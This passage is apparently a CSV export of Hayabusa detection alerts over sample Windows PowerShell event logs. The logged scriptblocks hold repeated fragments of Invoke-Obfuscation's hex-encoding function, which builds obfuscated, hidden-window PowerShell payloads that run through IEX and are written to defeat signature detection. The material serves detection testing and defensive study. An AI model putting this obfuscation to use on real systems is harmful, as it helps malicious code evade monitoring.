$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . 
* ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. 
# These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
